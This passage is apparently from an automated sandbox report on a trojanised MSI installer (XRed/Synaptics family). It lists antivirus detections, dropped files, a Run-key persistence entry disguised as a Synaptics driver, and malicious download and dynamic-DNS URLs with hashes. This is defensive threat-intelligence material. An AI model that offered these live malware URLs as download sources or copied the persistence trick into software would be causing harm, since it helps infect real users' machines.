49715, 49717 GOOGLEUS United States 23->50 52 docs.google.com 142.250.186.174, 443, 49709, 49710 GOOGLEUS United States 23->52 54 freedns.afraid.org 69.42.215.252, 49713, 80 AWKNET-LLCUS United States 23->54 36 C:\Users\user\DocumentsEGWXUHVUG\~$cache1, PE32 23->36 dropped 72 Antivirus detection for dropped file 23->72 74 Multi AV Scanner detection for dropped file 23->74 76 Drops PE files to the document folder of the user 23->76 78 Machine Learning detection for dropped file 23->78 28 WerFault.exe 22 16 23->28         started        file12 signatures13 process14

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              valyzt.msi70%VirustotalBrowse
                              valyzt.msi66%ReversingLabsWin32.Trojan.Synaptics
                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\Windows\Installer\MSI4755.tmp100%AviraTR/Dldr.Agent.SH
                              C:\Windows\Installer\MSI4755.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX49C5.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX49C5.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Windows\SysWOW64\._cache_MSI4755.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache1100%Joe Sandbox ML
                              C:\Windows\Installer\MSI4755.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX49C5.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX49C5.tmp92%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache192%ReversingLabsWin32.Worm.Zorex
                              C:\Windows\Installer\MSI4755.tmp92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Windows\SysWOW64\._cache_MSI4755.tmp55%ReversingLabsWin32.Trojan.Lisk
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/Synaptics.rarh100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SSLLibrary.dlD100%Avira URL Cloudmalware
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              69.42.215.252
                              truefalse
                                high
                                docs.google.com
                                142.250.186.174
                                truefalse
                                  high
                                  s-part-0017.t-0009.t-msedge.net
                                  13.107.246.45
                                  truefalse
                                    high
                                    s-part-0017.t-0009.fb-t-msedge.net
                                    13.107.253.45
                                    truefalse
                                      high
                                      drive.usercontent.google.com
                                      142.250.186.129
                                      truefalse
                                        high
                                        18.31.95.13.in-addr.arpa
                                        unknown
                                        unknownfalse
                                          high
                                          xred.mooo.com
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            xred.mooo.comfalse
                                              high
                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://docs.google.com/project.org.cnSynaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVSynaptics.exe, 00000004.00000002.2396842669.0000000005318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.usercontent.google.com/kSynaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1674551.msi.1.drfalse
                                                            high
                                                            https://docs.google.com/syndication-cn.comSynaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978hSynaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://docs.google.com/.youtubeeducatiZSynaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://docs.google.com/rSynaptics.exe, 00000004.00000002.2408827318.000000000EF1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://docs.google.com/.googl.Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://upx.sf.netAmcache.hve.12.drfalse
                                                                          high
                                                                          http://xred.site50.net/syn/Synaptics.rar674551.msi.1.drfalse
                                                                            high
                                                                            https://docs.google.com/imizSynaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://xred.site50.net/syn/Synaptics.rarhMSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://docs.google.com/bleclick.cnSynaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://docs.google.com/Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2408827318.000000000EF1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlXMSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://xred.site50.net/syn/SSLLibrary.dlDMSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1674551.msi.1.drfalse
                                                                                          high
                                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1674551.msi.1.drfalse
                                                                                            high
                                                                                            https://docs.google.com/ube.comSynaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&Synaptics.exe, 00000004.00000002.2403570018.000000000AA5E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://drive.usercontent.google.com/ASynaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://docs.google.com/MicrosoftSynaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://docs.google.com/e?MSynaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://xred.site50.net/syn/SUpdate.ini674551.msi.1.drfalse
                                                                                                          high
                                                                                                          https://docs.google.com/RSynaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://docs.google.com/apps.cnSynaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://docs.google.com/MSynaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://docs.google.com/uc?id=0;Synaptics.exe, 00000004.00000002.2412059221.0000000012C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2409682805.00000000100EE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978xMSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://xred.site50.net/syn/SSLLibrary.dll674551.msi.1.drfalse
                                                                                                                        high
                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs
                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        142.250.186.129
                                                                                                                        drive.usercontent.google.comUnited States
                                                                                                                        15169GOOGLEUSfalse
                                                                                                                        142.250.186.174
                                                                                                                        docs.google.comUnited States
                                                                                                                        15169GOOGLEUSfalse
                                                                                                                        69.42.215.252
                                                                                                                        freedns.afraid.orgUnited States
                                                                                                                        17048AWKNET-LLCUSfalse
                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1582346
                                                                                                                        Start date and time:2024-12-30 11:45:23 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 5m 55s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Run name:Without Instrumentation
                                                                                                                        Number of analysed new started processes analysed:14
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:valyzt.msi
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.expl.evad.winMSI@9/58@8/3
                                                                                                                        EGA Information:Failed
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        • Number of executed functions: 0
                                                                                                                        • Number of non-executed functions: 0
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .msi
                                                                                                                        • Close Viewer
                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.89.18, 184.28.90.27, 52.113.194.132, 52.168.117.169, 20.42.73.29, 40.126.32.76, 4.175.87.197, 13.107.246.45, 13.95.31.18, 20.12.23.50, 13.107.253.45
                                                                                                                        • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdeus10.eastus.cloudapp.azure.com, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                        • Execution Graph export aborted for target Synaptics.exe, PID 6520 because there are no executed function
                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                        TimeTypeDescription
                                                                                                                        05:46:20API Interceptor193x Sleep call for process: Synaptics.exe modified
                                                                                                                        05:46:49API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                        11:46:16AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        69.42.215.252New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        docx.msiGet hashmaliciousXRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        222.msiGet hashmaliciousXRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        s-part-0017.t-0009.t-msedge.netPurchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        docx.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        222.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        s-part-0017.t-0009.fb-t-msedge.netLWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        Salary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        IcisR4FC8n.dllGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        https://thaykinhgiasoc.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU9USlBZakE9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        Multi Graphics Inc CustomerVendor Form.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        OaSEt8i2jE.exeGet hashmaliciousNjratBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkGGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        PORgjGswYg.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.253.45
                                                                                                                        freedns.afraid.orgNew PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        docx.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        222.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        AWKNET-LLCUSNew PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        docx.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        222.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 69.42.215.252
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        37f463bf4616ecd445d4a1937da06e19New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        docx.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        222.msiGet hashmaliciousXRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 142.250.186.174
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        C:\ProgramData\Synaptics\RCX49C5.tmpNew PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                              222.msiGet hashmaliciousXRedBrowse
                                                                                                                                Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                                  222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                    C:\ProgramData\Synaptics\Synaptics.exe222.msiGet hashmaliciousXRedBrowse
                                                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):623
                                                                                                                                        Entropy (8bit):5.287178121825724
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:Eg2Zg8mmIdFLXS/cqj//pFvfN2zWotHMphe2WmmY3HDyzgj8Q:agTPSkqjM65ptyzAL
                                                                                                                                        MD5:459D394068A571AE5F234AD08ACD8B01
                                                                                                                                        SHA1:59CED7D678875C829AE38116F8978EE2B323E168
                                                                                                                                        SHA-256:6716215C0FF560A6BE11B6CB95182294F106CAB102F6E06FA8C23D3D660225F1
                                                                                                                                        SHA-512:D07E45916ADA575E9D945D80BEBC351D5F009957274114049D4549D35DB4AF76ADAA7417DCEBB5C3F446103FDE1026BA5251A9CCDE9421811C7704246BE0A909
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:...@IXOS.@.....@.-.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..valyzt.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}.@........RemoveODBC..Removing ODBC components..%._B3D13F97_1369_417D_A477_B4C42B829328...@.....@.....@....
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):118
                                                                                                                                        Entropy (8bit):3.5700810731231707
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                        MD5:573220372DA4ED487441611079B623CD
                                                                                                                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):65536
                                                                                                                                        Entropy (8bit):1.1336482840498854
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:sYOxVps9I40Kks/kDzJDzqjLOA/ytzxwzuiF5Z24IO8EKDzy:qy9WKksMJqj8KzuiF5Y4IO8zy
                                                                                                                                        MD5:62C2DF2F192BBC616A3887C6ECF05694
                                                                                                                                        SHA1:FDF285A7E236BF1474E5E69F0159CA32506E0B65
                                                                                                                                        SHA-256:2873A760F3B4C7199A0F7E4BD37590D0BCB446978E8FBE536B4CF73677305AC5
                                                                                                                                        SHA-512:CED1BDA38AB7CF758127720D4C7664870251C08B0FAD0DFE60B382E4D85B2C258E14383C2A6B13ED0FA434F6EDF150CF51C19671ACD68417C70F4CDC8A8883B4
                                                                                                                                        Malicious:false
